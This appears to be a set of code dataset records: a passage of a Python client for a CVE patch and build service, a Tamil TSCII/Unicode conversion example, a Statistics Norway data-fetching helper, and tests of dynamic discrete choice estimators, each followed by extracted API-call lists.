    def _findById(self, path, id):
        """Fetch a resource by id; `path` is a format string like 'cves/%s'."""
        # Is it a local file (instead of a remote id). This is just for debugging and should be removed TODO
        if len(id) > 1 and id[0] == '<' and id[-1] == '>' and id != "<removed>":
            with open(id[1:-1]) as data_file:
                return json.load(data_file)
        return self._requestGET(path=path % id)
        # TODO catch empty

    def reprJSON(self):
        """Return a dict of this object's attributes listed in `_postableFields`."""
        r = {}
        # BUG FIX: dict.iteritems() is Python 2 only and raises AttributeError
        # on Python 3; items() works on both.
        for k, v in self.__dict__.items():
            if k in self._postableFields:
                r[k] = v
        return r
class CVE(Remote):
    """A CVE record, constructed either by remote id or by CVE name.

    Accessing `.patchsets` lazily fetches and caches the CVE's patchsets.
    """

    def __init__(self, name=None, id=None):
        Remote.__init__(self)
        if id:
            cve = self._findById("cves/%s", id)
        elif name:
            cve = self._findByName(name)
        else:
            raise Exception('You have to give something to construct this CVE')
        self.__dict__.update(cve)

    def _findByName(self, name):
        """Resolve a CVE by its unique name; raise if missing or ambiguous."""
        cves = self._requestGET(where={"name": name}, path='cves')
        if len(cves) == 1:
            return cves[0]
        elif len(cves) == 0:
            raise Exception('CVE id not found: %s' % name)
        else:
            raise Exception('Multiple CVEs match %s' % name)

    def __getattr__(self, item):
        # BUG FIX: `is` tests object identity; whether two equal string
        # literals are the same object is an interpreter detail, so the
        # comparison must use `==`.
        if item == "patchsets":
            patchsets = self._requestGET(path="cves/%s/patchsets" % self.id)
            self.patchsets = [Patchsets(json=patchset) for patchset in patchsets]
            return self.patchsets
        else:
            raise AttributeError(item)
class Patchsets(Remote):
    """A patchset resource; accessing `.patches` lazily fetches its patches."""

    def __init__(self, json=None):
        Remote.__init__(self)
        # BUG FIX: a `json={}` default is a shared mutable default argument.
        self.__dict__.update(json or {})

    def __getattr__(self, item):
        # BUG FIX: compare strings with `==`, not the identity operator `is`.
        if item == "patches":
            patches = self._requestGET(path="patchsets/%s/patches" % self.id)
            # BUG FIX: children of a patchset are patches, not hunks; the old
            # code wrapped them in Hunk, which breaks Patch's lazy `.hunks`.
            self.patches = [Patch(json=patch) for patch in patches]
            return self.patches
        else:
            raise AttributeError(item)
class Patch(Remote):
    """A patch resource; accessing `.hunks` lazily fetches its hunks."""

    def __init__(self, json=None):
        Remote.__init__(self)
        # BUG FIX: avoid the shared mutable-default-argument pitfall.
        self.__dict__.update(json or {})

    def __getattr__(self, item):
        # BUG FIX: compare strings with `==`, not the identity operator `is`.
        if item == "hunks":
            hunks = self._requestGET(path="patches/%s/hunks" % self.id)
            self.hunks = [Hunk(json=patch) for patch in hunks]
            return self.hunks
        else:
            raise AttributeError(item)
class Hunk(Remote):
    """A hunk resource; `.cve` lazily resolves the owning CVE."""

    # Attributes that may be serialized back to the server.
    _postableFields = [
        'cveId',
        'data',
        'fileName',
        'id',
        'patchId',
        'patchsetId'
    ]

    def __init__(self, json=None, id=None):
        Remote.__init__(self)
        if id:
            json = self._findById("hunks/%s", id)
        # BUG FIX: avoid the shared mutable-default-argument pitfall.
        self.__dict__.update(json or {})

    def __getattr__(self, item):
        # BUG FIX: string comparisons use `==`, not `is`.
        if item == "hunks":
            hunks = self._requestGET(path="patches/%s/hunks" % self.id)
            self.hunks = [Hunk(json=patch) for patch in hunks]
        elif item == "cve":
            self.cve = CVE(id=self.cveId)
        else:
            # BUG FIX: __getattr__ is only called after normal lookup already
            # failed, so __dict__[item] always raised KeyError here, which
            # breaks hasattr()/getattr(default). Raise AttributeError instead.
            raise AttributeError(item)
        return getattr(self, item)
class Setup(Remote):
    """A setup resource exposing `name`, `content`, and `id`."""

    def __init__(self, json=None, id=None):
        Remote.__init__(self)
        if id:
            json = self._findById("setups/%s", id)
        # BUG FIX: `json={}` was a shared mutable default argument; missing
        # keys still raise KeyError, exactly as before.
        json = json or {}
        self.name = json['name']
        self.content = json['content']
        self.id = json['id']
class Build(Remote):
    """A build job; by default constructs itself from the next waiting build."""

    # Attributes that may be serialized back to the server.
    _postableFields = ['pkgName',
                       'pkgVersion',
                       'mode',
                       'status',
                       'dist',
                       'urgency',
                       'hunks',
                       'results',
                       'cveId',
                       'patchsetId',
                       'cveName',
                       'id']

    def __init__(self, json=None, where=None, id=None):
        '''if empty, get the next waiting build.
        with where, it gives you the next waiting with that filter'''
        Remote.__init__(self)
        if id:
            json = self._findById("builds/%s", id)
        if not json:
            json = self._nextWaiting(where=where)
        if not json:
            from json import dumps
            raise Exception('No pending builds (filter: %s)' % dumps(where))
        self.__dict__.update(json)

    def _nextWaiting(self, json=None, where=None):
        """Return the oldest waiting build matching `where`, or None."""
        # BUG FIX: the old `where={}` default was mutated in place (shared
        # across calls), and __init__ may pass where=None, which the old code
        # then subscripted (TypeError). Copy/normalize before mutating.
        where = dict(where) if where else {}
        where["status"] = "waiting"
        result = self._requestGET(where=where, limit=1, order='timestamp ASC', path='builds')
        if len(result):
            return result[0]
        else:
            return None

    def updateResults(self, data):
        """POST one result record per element of `data` (a dict or list of dicts)."""
        if not isinstance(data, list):
            data = [data]
        o = {'buildId': self.id, 'data': {}}
        for d in data:
            o['data'] = d
            self._requestPOST(path='results', data=json.dumps(o))
        # TODO update the object with the new data?

    def updateStatus(self, status):
        """PATCH the build's status field on the server and return the response."""
        result = self._requestPATCH(path='builds/%s' % self.id, data=json.dumps({'status': status}))
        # TODO update the object with the new data?
        return result

    def updateStarted(self, now):
        """PATCH the build's `started` timestamp on the server."""
        result = self._requestPATCH(path='builds/%s' % self.id, data=json.dumps({'started': now}))
        return result

    def postme(self):
        """Serialize this build (via ComplexEncoder) and POST it; return the created Build."""
        data = json.dumps(self.reprJSON(), cls=ComplexEncoder)
        result = self._requestPOST(path='builds', data=data)
        return Build(result)
class RemoteEncoder(json.JSONEncoder):
    """JSON encoder that serializes objects via their `_postableFields`.

    Strings pass through unchanged; every postable attribute value is itself
    JSON-encoded recursively with this encoder.
    """

    def default(self, o):
        r = {}
        if type(o) is str:
            return o
        # BUG FIX: dict.iteritems() is Python 2 only and raises AttributeError
        # on Python 3; items() works on both.
        for k, v in o.__dict__.items():
            if k in o._postableFields:
                r[k] = json.dumps(v, cls=RemoteEncoder)
        return r
class ComplexEncoder(json.JSONEncoder):
    """JSON encoder that delegates to an object's reprJSON() when it has one,
    falling back to the standard encoder (which raises TypeError) otherwise."""

    def default(self, obj):
        # Guard clause: objects without the reprJSON hook take the stock path.
        if not hasattr(obj, 'reprJSON'):
            return json.JSONEncoder.default(self, obj)
        return obj.reprJSON()
class Result(Remote):
    """A single build result record."""

    # Attributes that may be serialized back to the server.
    _postableFields = [
        'children',
        'deb',
        'debdiff',
        'hunkId',
        'id',
        'log',
        'results',
        'status',
        'type']

    def __init__(self, json=None):
        Remote.__init__(self)
        # BUG FIX: avoid the shared mutable-default-argument pitfall.
        self.__dict__.update(json or {})
class Results(list):
    """A list of Result objects, optionally fetched remotely for a build id."""

    def __init__(self, results=None, buildId=None):
        list.__init__(self)
        # BUG FIX: `results=[]` was a shared mutable default argument.
        results = results or []
        if buildId:
            # A given buildId overrides any passed-in results.
            r = Remote()
            results = r._requestGET(where={"buildId": buildId}, path='results')
        for result in results:
            self.append(Result(json=result))
|
[
"requests.patch",
"json.load",
"json.dumps",
"requests.delete",
"json.JSONEncoder.default",
"requests.get",
"requests.post",
"os.getenv"
] |
[((1170, 1185), 'os.getenv', 'getenv', (['"""TOKEN"""'], {}), "('TOKEN')\n", (1176, 1185), False, 'from os import getenv\n'), ((1611, 1655), 'requests.post', 'requests.post', (['u'], {'data': 'data', 'headers': 'headers'}), '(u, data=data, headers=headers)\n', (1624, 1655), False, 'import requests\n'), ((1974, 2019), 'requests.patch', 'requests.patch', (['u'], {'data': 'data', 'headers': 'headers'}), '(u, data=data, headers=headers)\n', (1988, 2019), False, 'import requests\n'), ((2275, 2293), 'requests.delete', 'requests.delete', (['u'], {}), '(u)\n', (2290, 2293), False, 'import requests\n'), ((2800, 2815), 'requests.get', 'requests.get', (['u'], {}), '(u)\n', (2812, 2815), False, 'import requests\n'), ((8588, 8623), 'json.JSONEncoder.default', 'json.JSONEncoder.default', (['self', 'obj'], {}), '(self, obj)\n', (8612, 8623), False, 'import json\n'), ((2756, 2774), 'json.dumps', 'json.dumps', (['filter'], {}), '(filter)\n', (2766, 2774), False, 'import json\n'), ((3250, 3270), 'json.load', 'json.load', (['data_file'], {}), '(data_file)\n', (3259, 3270), False, 'import json\n'), ((7724, 7754), 'json.dumps', 'json.dumps', (["{'status': status}"], {}), "({'status': status})\n", (7734, 7754), False, 'import json\n'), ((7933, 7961), 'json.dumps', 'json.dumps', (["{'started': now}"], {}), "({'started': now})\n", (7943, 7961), False, 'import json\n'), ((8366, 8398), 'json.dumps', 'json.dumps', (['v'], {'cls': 'RemoteEncoder'}), '(v, cls=RemoteEncoder)\n', (8376, 8398), False, 'import json\n'), ((7016, 7028), 'json.dumps', 'dumps', (['where'], {}), '(where)\n', (7021, 7028), False, 'from json import dumps\n'), ((7552, 7565), 'json.dumps', 'json.dumps', (['o'], {}), '(o)\n', (7562, 7565), False, 'import json\n')]
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# (C) 2014 Arulalan.T <<EMAIL>>
# (C) 2015 <NAME>
# This file is part of 'open-tamil/txt2unicode' package examples
#
import sys
sys.path.append("../..")
from tamil.txt2unicode import tscii2unicode, unicode2tscii
tscii = """¾¢ÕÅûÙÅ÷ «ÕǢ ¾¢ÕìÌÈû """
uni_1 = tscii2unicode(tscii)
tscii_from_uni = unicode2tscii(uni_1)
uni_2 = tscii2unicode(tscii_from_uni)
f = open("encode-result.txt", "w")
f.write("Initial tscii : " + tscii + "\n\n")
f.write("From tscii to unicode : " + uni_1 + "\n\n")
f.write("From unicode to tscii : " + tscii_from_uni + "\n\n")
f.write("Again back to unicode from above tscii : " + uni_2)
f.close()
assert uni_1 == uni_2, " Both unicode are 'not' same! "
assert tscii == tscii_from_uni, " Both tscii are 'not' same! "
print("tscii original input", tscii)
print("from tscii2unicode", uni_1)
print("from unicode2tscii", tscii_from_uni)
print("back to unicode", uni_2)
print("converted unicode stored in 'encode-result.txt' file")
|
[
"sys.path.append",
"tamil.txt2unicode.tscii2unicode",
"tamil.txt2unicode.unicode2tscii"
] |
[((177, 201), 'sys.path.append', 'sys.path.append', (['"""../.."""'], {}), "('../..')\n", (192, 201), False, 'import sys\n'), ((309, 329), 'tamil.txt2unicode.tscii2unicode', 'tscii2unicode', (['tscii'], {}), '(tscii)\n', (322, 329), False, 'from tamil.txt2unicode import tscii2unicode, unicode2tscii\n'), ((347, 367), 'tamil.txt2unicode.unicode2tscii', 'unicode2tscii', (['uni_1'], {}), '(uni_1)\n', (360, 367), False, 'from tamil.txt2unicode import tscii2unicode, unicode2tscii\n'), ((376, 405), 'tamil.txt2unicode.tscii2unicode', 'tscii2unicode', (['tscii_from_uni'], {}), '(tscii_from_uni)\n', (389, 405), False, 'from tamil.txt2unicode import tscii2unicode, unicode2tscii\n')]
|
"""
coding: utf-8
@authour: <NAME>, modified <NAME>
Inspired by:
https://github.com/hmelberg/stats-to-pandas/blob/master/stats_to_pandas/__init__.py
https://github.com/eurostat/prophet
"""
from __future__ import print_function
import pandas as pd
import requests
import ast
from pyjstat import pyjstat
from collections import OrderedDict
from ipywidgets import widgets
from IPython.display import display
# todo: consider using jsonstat instead of pyjstat
class API_to_data:
def __init__(self, language='en', base_url='http://data.ssb.no/api/v0'):
"""
Parameters:
-----------
language: string
default in Statistics Norway: 'en' (Search for English words)
optional in Statistics Norway: 'no' (Search for Norwegian words)
url: string
default in Statistics Norway: 'http://data.ssb.no/api/v0'
different defaults can be specified
"""
self.language = language
self.burl = base_url
self.furl = None
self.variables = None
self.time = None
    def search(self, phrase):
        """
        Search for tables that contain the phrase in Statistics Norway.
        Returns a pandas dataframe with the results (empty if no match),
        indexed by table_id with table_title as the first column.
        Not case sensitive.
        Language sensitive (specified in the language option)
        Example
        -------
        df = search("income")
        Parameters
        ----------
        phrase: string
            The phrase can contain several words (space separated):
            search("export Norwegian parrot")
            It also supports trucation:
            search("pharma*")
        """
        # todo: make converter part of the default specification only for statistics norway
        # Percent-encode Norwegian letters and URL-special characters by hand.
        convert = {'æ' : '%C3%A6', 'Æ' : '%C3%86', 'ø' : '%C3%B8', 'Ø' : '%C3%98', 'å' : '%C3%A5', 'Å' : '%C3%85',
                   '"' : '%22', '(' : '%28', ')' : '%29', ' ' : '%20'}
        search_str = '{base_url}/{language}/table/?query={phrase}'.format(base_url=self.burl, language=self.language, phrase=phrase)
        for k, v in convert.items():
            search_str = search_str.replace(k, v)
        # pd.read_json fetches the URL directly and parses the JSON response.
        df = pd.read_json(search_str)
        if len(df) == 0:
            print("No match")
            return df
        # make the dataframe more readable
        # (is it worth it? increases vulnerability. formats may differ and change)
        # todo: make search and format conditional on the database being searched
        # split the table name into table id and table text
        df['table_id'] = df['title'].str.split(':').str.get(0)
        df['table_title'] = df['title'].str.split(':').str.get(1)
        del df['title']
        # make table_id the index, visually more intuitive with id as first column
        df = df.set_index('table_id')
        # change order of columns to make it more intuitive (table_title is first)
        cols = df.columns.tolist()
        cols.sort(reverse=True)
        df = df[cols[:-2]]
        return df
def get_variables(self, table_id=None):
"""
Returns a list.
Each element of the list is a dictionary that provides more
information about a variable.
For instance, one variable may contain information about the
different years that are available.
Parameters
----------
table_id: string
the unique table_id number, a string including leading zeros.
"""
try:
numb = int(table_id)
if len(str(numb)) == 4:
numb = '0' + str(numb)
except ValueError:
print('table_id mus be of type integer')
if self.furl is None:
self.furl = '{base_url}/{language}/table/{table_id}'.format(base_url=self.burl, language=self.language,
table_id=numb)
df = pd.read_json(self.furl)
variables = [dict(values) for values in df.iloc[:, 1]]
return variables
    def select(self, table_id):
        """
        Selects a table based on the table_id and returns a widget container
        in which the user can select the set of variables and values to be
        included in the final table.
        Example
        --------
        box = select(table_id = '10714')
        Parameters
        ----------
        table_id : string
            the id of the desired table
        """
        # get a list with dictionaries containing information about each variable
        # (also sets self.furl as a side effect, used below and by get_json)
        self.variables = self.get_variables(table_id=table_id)
        table_info = pd.read_json(self.furl)
        table_title = table_info.iloc[0, 0]
        # get number of variables (ok, childish approach, can be simplified!)
        nvars = len(self.variables)
        var_list = list(range(nvars))
        # a list of dictionaries of the values available for each variable
        option_list = [OrderedDict(zip(self.variables[var]['valueTexts'],
                                        self.variables[var]['values']))
                       for var in var_list]
        # create a selection widget for each variable
        # todo: skip widget or make it invisible if there is only one option?
        # todo: make first alternative a default selection initially for all tables?
        # todo: add buttons for selecting "all", "latest" , "first" and "none"
        selection_widgets = [widgets.widget_selection.SelectMultiple(
            options=option_list[var],
            rows=8,
            layout={'width' : '500px'}
        )
            for var in var_list]
        # put all the widgets in a container
        variables_container = widgets.Tab(selection_widgets)
        # label each container with the variable label
        for var in var_list:
            title = str(self.variables[var]['text'])
            variables_container.set_title(var, title)
        # build widgets and put in one widget container
        headline = widgets.Label(value = table_title, color = 'blue')
        endline = widgets.Label(value='''Select category and click on elements 
            to be included in the table (CTRL-A selects "all")''')
        url_text = widgets.Label(value=self.furl)
        from IPython.display import display
        button = widgets.Button(description="Click when finished")
        # NOTE(review): get_json() relies on this exact child order
        # (children[2] = variable tabs, children[3] = url label).
        selection_container = widgets.VBox([headline,
                                      endline,
                                      variables_container,
                                      url_text,
                                      button])
        selection_container.layout.border = '3px grey solid'
        def clicked(b):
            # The click handler only confirms; the selections live in the widgets.
            print('Info is saved. You can now run the rest of the code :)')
        button.on_click(clicked)
        return selection_container
    def get_json(self, box=None, out='dict'):
        """
        Takes a widget container as input (where the user has selected varables)
        and returns a json dictionary or string that will fetch these variables.
        The json follows the json-stat format.
        Parameters
        ----------
        box : widget container
            name of widget box with the selected variables
        out : string
            default: 'dict', options: 'str'
            The json can be returned as a dictionary or a string.
            The final end query should use a dict, but some may find it useful to
            get the string and revise it before transforming it back to a dict.
        Example
        -------
        json_query = get_json(box)
        """
        # NOTE(review): table_url is assigned but never used in this method.
        table_url = box.children[3].value
        # children[2] is the Tab of per-variable selection widgets built by select().
        nvars = len(box.children[2].children)
        var_list = list(range(nvars))
        query_element = {}
        # create a dict of strings, one for each variable that specifies
        # the json-stat that selects the variables/values
        for x in var_list:
            value_list = str(list(box.children[2].children[x].value))
            # Doubled braces {{ }} are literal braces in str.format.
            query_element[x] = '{{"code": "{code}", "selection": {{"filter": "item", "values": {values} }}}}'.format(
                code = self.variables[x]['code'],
                values = value_list)
            query_element[x] = query_element[x].replace("\'", '"')
        all_elements = str(list(query_element.values()))
        all_elements = all_elements.replace("\'", "")
        query = '{{"query": {all_elements} , "response": {{"format": "json-stat" }}}}'.format(all_elements = all_elements)
        if out == 'dict':
            query = ast.literal_eval(query)
        # todo: build it as a dictionary to start with (and not a string that is made into a dict as now)
        # todo: add error message if required variables are not selected
        # todo: avoid repeat downloading of same information
        # eg. get_variables is sometimes used three times before a table is downloaded
        return query
def to_dict(json_str):
"""
Transforms a string to a dictionary.
Note: Will fail if string is not correctly specified.
"""
# OK, really unnecessary func, but a concession to less experienced users
# todo: use json module instead, json.dumps()
query = ast.literal_eval(json_str)
return query
def read_box(self, from_box):
"""
Takes a widget container as input (where the user has selected varables)
and returns a pandas dataframe with the values for the selected variables.
Example
-------
df = read_box(box)
Parameters:
-----------
from_box: widget container
"""
try:
query = self.get_json(from_box)
url = from_box.children[3].value
data = requests.post(url, json=query)
results = pyjstat.from_json_stat(data.json(object_pairs_hook=OrderedDict))
label = data.json(object_pairs_hook=OrderedDict)
return [results[0], label['dataset']['label']]
except TypeError:
print('You must make choices in the box!')
except:
print('You must make choices in the box!')
def fiksDato(self, dato):
hjdat = int(dato[5:6]) * 3
hjdat2 = str(hjdat)
if hjdat < 12:
dato = dato[0:4] + '-0' + hjdat2
else:
dato = dato[0:4] + '-' + hjdat2
dates = pd.date_range(dato, periods=1, freq='M')
dato = str(dates[0])
return dato
    def prepare_dataframe(self, df, val_col='value'):
        """
        Reshape an SSB result frame into Prophet's two-column [ds, y] format.

        The time column is taken as df.columns[-2] and its frequency is
        inferred from the label format: 'M' = month, 'U' = week, 'K' = quarter,
        otherwise year. Returns [df_ret, freq, periods] where df_ret has
        columns ['ds', 'y'], freq is a pandas frequency code and periods the
        number of periods per year.

        Parameters:
        -----------
        val_col : type string
            Name of column containing the values (usually 'value')
        df : typ pandas.DataFrame
            The dataset one want to make forecast of
        """
        # The time column name differs by language ('måned'/'month', etc.);
        # it is assumed to be the second-to-last column.
        self.time = time_col = df.columns[-2]
        if self.language == 'no':
            df_ret = df[[self.time, val_col]]
            if 'M' in df_ret.loc[0, self.time]:
                self.time = 'måned'
                df_ret = df[[self.time, val_col]]
                # '2015M01' -> '2015-01' which pandas parses as a month
                df_ret.loc[:, self.time] = pd.to_datetime(df[self.time].str.replace('M', '-'))
                freq = 'M';
                periods = 12;
            elif 'U' in df_ret.loc[0, self.time]:
                self.time = 'uke'
                df_ret = df[[self.time, val_col]]
                # '%Y-%W-%w' with appended '-1' anchors each ISO week to Monday
                df_ret.loc[:, self.time] = pd.to_datetime((df[self.time].str.replace('U', '-')).add('-1'), format='%Y-%W-%w')
                freq = 'W'
                periods = 52
            elif 'K' in df_ret.loc[0, self.time]:
                self.time = 'kvartal'
                df_ret = df[[self.time, val_col]]
                df_ret.loc[:, self.time] = pd.to_datetime(df[self.time].str.replace('K', '-'))
                # fiksDato maps 'YYYYKQ' to the quarter's last calendar day
                df_ret.loc[:, self.time] = df[self.time].apply(self.fiksDato)
                freq = 'q'
                periods = 4
            else:
                self.time = 'år'
                df_ret = df[[self.time, val_col]]
                df_ret.loc[:, self.time] = pd.to_datetime(df[self.time])
                freq = 'y'
                periods = 1
        elif self.language == 'en':
            df_ret = df[[self.time, val_col]]
            if 'M' in df_ret.loc[0, self.time]:
                self.time = 'month'
                df_ret = df[[self.time, val_col]]
                df_ret.loc[:, self.time] = pd.to_datetime(df[self.time].str.replace('M', '-'))
                freq = 'M'
                periods = 12
            elif 'U' in df_ret.loc[0, self.time]:
                self.time = 'week'
                df_ret = df[[self.time, val_col]]
                df_ret.loc[:, self.time] = pd.to_datetime((df[self.time].str.replace('U', '-')).add('-1'), format='%Y-%W-%w')
                freq = 'W'
                periods = 52
            elif 'K' in df_ret.loc[0, self.time]:
                self.time = 'quarter'
                df_ret = df[[self.time, val_col]]
                df_ret.loc[:, self.time] = pd.to_datetime(df[self.time].str.replace('K', '-'))
                df_ret.loc[:, self.time] = df[self.time].apply(self.fiksDato)
                freq = 'q'
                periods = 4
            else:
                self.time = 'year'
                df_ret = df[[self.time, val_col]]
                df_ret.loc[:, self.time] = pd.to_datetime(df[self.time])
                freq = 'y'
                periods = 1
        # NOTE(review): if self.language is neither 'no' nor 'en', df_ret is
        # never assigned and the line below raises UnboundLocalError.
        #the input to `Prophet` is always a `pandas.DataFrame` object, and it must contain two columns: `ds` and `y`:
        df_ret.columns = ['ds', 'y']
        return [df_ret, freq, periods]
|
[
"pandas.date_range",
"pandas.read_json",
"ipywidgets.widgets.Button",
"ipywidgets.widgets.Label",
"pandas.to_datetime",
"ipywidgets.widgets.Tab",
"ast.literal_eval",
"ipywidgets.widgets.widget_selection.SelectMultiple",
"requests.post",
"ipywidgets.widgets.VBox"
] |
[((2200, 2224), 'pandas.read_json', 'pd.read_json', (['search_str'], {}), '(search_str)\n', (2212, 2224), True, 'import pandas as pd\n'), ((3961, 3984), 'pandas.read_json', 'pd.read_json', (['self.furl'], {}), '(self.furl)\n', (3973, 3984), True, 'import pandas as pd\n'), ((4675, 4698), 'pandas.read_json', 'pd.read_json', (['self.furl'], {}), '(self.furl)\n', (4687, 4698), True, 'import pandas as pd\n'), ((5846, 5876), 'ipywidgets.widgets.Tab', 'widgets.Tab', (['selection_widgets'], {}), '(selection_widgets)\n', (5857, 5876), False, 'from ipywidgets import widgets\n'), ((6145, 6191), 'ipywidgets.widgets.Label', 'widgets.Label', ([], {'value': 'table_title', 'color': '"""blue"""'}), "(value=table_title, color='blue')\n", (6158, 6191), False, 'from ipywidgets import widgets\n'), ((6215, 6353), 'ipywidgets.widgets.Label', 'widgets.Label', ([], {'value': '"""Select category and click on elements \n to be included in the table (CTRL-A selects "all")"""'}), '(value=\n """Select category and click on elements \n to be included in the table (CTRL-A selects "all")"""\n )\n', (6228, 6353), False, 'from ipywidgets import widgets\n'), ((6364, 6394), 'ipywidgets.widgets.Label', 'widgets.Label', ([], {'value': 'self.furl'}), '(value=self.furl)\n', (6377, 6394), False, 'from ipywidgets import widgets\n'), ((6457, 6506), 'ipywidgets.widgets.Button', 'widgets.Button', ([], {'description': '"""Click when finished"""'}), "(description='Click when finished')\n", (6471, 6506), False, 'from ipywidgets import widgets\n'), ((6538, 6610), 'ipywidgets.widgets.VBox', 'widgets.VBox', (['[headline, endline, variables_container, url_text, button]'], {}), '([headline, endline, variables_container, url_text, button])\n', (6550, 6610), False, 'from ipywidgets import widgets\n'), ((9425, 9451), 'ast.literal_eval', 'ast.literal_eval', (['json_str'], {}), '(json_str)\n', (9441, 9451), False, 'import ast\n'), ((10585, 10625), 'pandas.date_range', 'pd.date_range', (['dato'], {'periods': '(1)', 'freq': 
'"""M"""'}), "(dato, periods=1, freq='M')\n", (10598, 10625), True, 'import pandas as pd\n'), ((5488, 5592), 'ipywidgets.widgets.widget_selection.SelectMultiple', 'widgets.widget_selection.SelectMultiple', ([], {'options': 'option_list[var]', 'rows': '(8)', 'layout': "{'width': '500px'}"}), "(options=option_list[var], rows=8,\n layout={'width': '500px'})\n", (5527, 5592), False, 'from ipywidgets import widgets\n'), ((8737, 8760), 'ast.literal_eval', 'ast.literal_eval', (['query'], {}), '(query)\n', (8753, 8760), False, 'import ast\n'), ((9958, 9988), 'requests.post', 'requests.post', (['url'], {'json': 'query'}), '(url, json=query)\n', (9971, 9988), False, 'import requests\n'), ((12358, 12387), 'pandas.to_datetime', 'pd.to_datetime', (['df[self.time]'], {}), '(df[self.time])\n', (12372, 12387), True, 'import pandas as pd\n'), ((13641, 13670), 'pandas.to_datetime', 'pd.to_datetime', (['df[self.time]'], {}), '(df[self.time])\n', (13655, 13670), True, 'import pandas as pd\n')]
|
import numpy as np
from source_ddc.simulation_tools import simulate
from source_ddc.algorithms import NFXP, NPL, CCP
from source_ddc.probability_tools import StateManager, random_ccp
from test.utils.functional_tools import average_out
n_repetitions = 10
def test_nfxp(simple_transition_matrix):
    """NFXP estimation should recover the true structural parameters
    (averaged over ``n_repetitions`` simulated datasets)."""

    def utility_fn(theta, choices, states):
        # Build (n_choices, n_states) grids, then reshape the flow payoff
        # to the (n_choices, n_states, 1) layout the estimators expect.
        state_grid, action_grid = np.meshgrid(states, choices)
        payoff = theta[0] * np.log(state_grid + 1) - theta[1] * action_grid
        return payoff.reshape((len(choices), -1, 1))

    true_params = [0.5, 3]
    discount_factor = 0.95
    n_choices = 2
    n_states = 5
    state_manager = StateManager(miles=n_states)

    @average_out(n_repetitions)
    def run_once():
        df, _ = simulate(500, 100, n_choices, state_manager, true_params,
                         utility_fn, discount_factor, simple_transition_matrix)
        estimator = NFXP(df['action'].values,
                         df['state'].values,
                         simple_transition_matrix,
                         utility_fn,
                         discount_factor,
                         parameter_names=['variable_cost', 'replacement_cost'])
        return estimator.estimate(start_params=[-1, -1], method='bfgs')

    mean_params = run_once()
    # Average estimates must land within 0.05 of each true parameter.
    assert np.all(np.abs(mean_params - true_params) < np.array([0.05, 0.05]))
def test_ccp(simple_transition_matrix):
    """CCP estimation (seeded with the simulated choice probabilities)
    should recover the true structural parameters."""

    def utility_fn(theta, choices, states):
        # Flow payoff on a (n_choices, n_states) grid, reshaped to
        # (n_choices, n_states, 1) as required by the estimators.
        state_grid, action_grid = np.meshgrid(states, choices)
        payoff = theta[0] * np.log(state_grid + 1) - theta[1] * action_grid
        return payoff.reshape((len(choices), -1, 1))

    true_params = [0.5, 3]
    discount_factor = 0.95
    n_choices = 2
    n_states = 5
    state_manager = StateManager(miles=n_states)

    @average_out(n_repetitions)
    def run_once():
        # The simulator also returns the conditional choice probabilities,
        # which CCP uses as its initial_p.
        df, ccp = simulate(500, 100, n_choices, state_manager, true_params,
                           utility_fn, discount_factor, simple_transition_matrix)
        estimator = CCP(df['action'].values,
                        df['state'].values,
                        simple_transition_matrix,
                        utility_fn,
                        discount_factor,
                        initial_p=ccp,
                        parameter_names=['variable_cost', 'replacement_cost'])
        return estimator.estimate(start_params=[1, 1], method='bfgs')

    mean_params = run_once()
    assert np.all(np.abs(mean_params - true_params) < np.array([0.05, 0.05]))
def test_npl(simple_transition_matrix):
    """NPL estimation, started from random choice probabilities,
    should recover the true structural parameters."""

    def utility_fn(theta, choices, states):
        # Flow payoff on a (n_choices, n_states) grid, reshaped to
        # (n_choices, n_states, 1) as required by the estimators.
        state_grid, action_grid = np.meshgrid(states, choices)
        payoff = theta[0] * np.log(state_grid + 1) - theta[1] * action_grid
        return payoff.reshape((len(choices), -1, 1))

    true_params = [0.5, 3]
    discount_factor = 0.95
    n_choices = 2
    n_states = 5
    state_manager = StateManager(miles=n_states)

    @average_out(n_repetitions)
    def run_once():
        df, _ = simulate(500, 100, n_choices, state_manager, true_params,
                         utility_fn, discount_factor, simple_transition_matrix)
        # NPL iterates from an arbitrary starting CCP guess.
        initial_guess = random_ccp(n_states, n_choices)
        estimator = NPL(df['action'].values,
                        df['state'].values,
                        simple_transition_matrix,
                        utility_fn,
                        discount_factor,
                        initial_p=initial_guess,
                        parameter_names=['variable_cost', 'replacement_cost'])
        return estimator.estimate(start_params=[1, 1], method='bfgs')

    mean_params = run_once()
    assert np.all(np.abs(mean_params - true_params) < np.array([0.05, 0.05]))
def test_npl_relaxation_param(simple_transition_matrix):
    """NPL with a relaxation parameter and an iteration cap should still
    recover the true structural parameters."""

    def utility_fn(theta, choices, states):
        # Flow payoff on a (n_choices, n_states) grid, reshaped to
        # (n_choices, n_states, 1) as required by the estimators.
        state_grid, action_grid = np.meshgrid(states, choices)
        payoff = theta[0] * np.log(state_grid + 1) - theta[1] * action_grid
        return payoff.reshape((len(choices), -1, 1))

    true_params = [0.5, 3]
    discount_factor = 0.95
    n_choices = 2
    n_states = 5
    state_manager = StateManager(miles=n_states)

    @average_out(n_repetitions)
    def run_once():
        df, _ = simulate(500, 100, n_choices, state_manager, true_params,
                         utility_fn, discount_factor, simple_transition_matrix)
        initial_guess = random_ccp(n_states, n_choices)
        # Damped NPL updates (relaxation_param) with a hard iteration cap.
        estimator = NPL(df['action'].values,
                        df['state'].values,
                        simple_transition_matrix,
                        utility_fn,
                        discount_factor,
                        initial_p=initial_guess,
                        relaxation_param=0.9,
                        parameter_names=['variable_cost', 'replacement_cost'],
                        npl_maxiter=50)
        return estimator.estimate(start_params=[1, 1], method='bfgs')

    mean_params = run_once()
    assert np.all(np.abs(mean_params - true_params) < np.array([0.05, 0.05]))
|
[
"numpy.meshgrid",
"numpy.abs",
"numpy.log",
"source_ddc.probability_tools.StateManager",
"test.utils.functional_tools.average_out",
"source_ddc.algorithms.NPL",
"source_ddc.probability_tools.random_ccp",
"numpy.array",
"source_ddc.simulation_tools.simulate",
"source_ddc.algorithms.CCP",
"source_ddc.algorithms.NFXP"
] |
